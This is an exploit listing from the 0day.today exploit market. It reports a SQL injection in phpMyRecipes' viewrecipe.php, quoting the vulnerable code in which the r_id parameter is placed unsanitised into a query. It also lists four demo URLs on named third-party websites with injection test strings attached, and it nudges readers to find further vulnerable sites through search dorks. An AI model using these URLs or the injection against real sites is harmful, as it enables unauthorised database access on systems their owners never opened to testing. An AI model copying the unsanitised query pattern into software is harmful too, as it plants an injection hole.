[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

phpMyMyRecipes 1.x.x SQL Injection Vulnerability

Author
TUNISIAN CYBER
Risk
[
Security Risk High
]
0day-ID
0day-ID-21671
Category
web applications
Date add
15-12-2013
Platform
php
[+] Author: TUNISIAN CYBER
[+] Exploit Title:  phpMyMyRecipes 1.x.x SQL Injection Vulnerability
[+] Date: 15-12-2013
[+] Category: WebApp
[+] Vendor: http://sourceforge.net/projects/php-myrecipes/files/
[+] Google Dork: Use your mind.
[+] Tested on: Win7 , ubuntu 13.04
[+] Friend's blog: http://na3il.wordpress.com/
   
########################################################################################
v1.2.2 discovered by The Black Devils(http://1337day.com/exploit/20472)
=================================================================================
Vulnerability was found in /phpMyRecipes/recipes/viewrecipe.php
v1.2.0: Lines:38-->42:
  $r_id = $_GET['r_id'];

  if (! ($result = mysql_query("SELECT name,category,servings,ingredients,instructions,description,creator,editor,imagefile FROM recipes WHERE id=$r_id"))) {
    dberror("viewrecipe.php", "Cannot select recipe");
  }
  
v1.2.1: Lines:38-->42:
  $r_id = $_GET['r_id'];

  if (! ($result = mysql_query("SELECT name,category,servings,ingredients,instructions,description,creator,editor,imagefile FROM recipes WHERE id=$r_id"))) {
    dberror("viewrecipe.php", "Cannot select recipe");
  }

v1.2.2: Lines:38-->42:
  $r_id = $_GET['r_id'];

  if (! ($result = mysql_query("SELECT name,category,servings,ingredients,instructions,description,creator,editor,imagefile FROM recipes WHERE id=$r_id"))) {
    dberror("viewrecipe.php", "Cannot select recipe");
  }
================================================================================= 
 As you can see the same vulenrability.
=================================================================================
Demo:
http://recipes.delattre.ca/recipes/viewrecipe.php?r_id=%27'
http://cruftysite.com/recipetest/recipes/viewrecipe.php?r_id=8'
http://tabledideas.com/recipes/recipes/viewrecipe.php?r_id=76'
http://computx.us/recipes/recipes/viewrecipe.php?r_id=4'
########################################################################################
Greets to: XMaX-tn, N43il HacK3r, XtechSEt,sec4ever

#  0day.today [2024-12-24]  #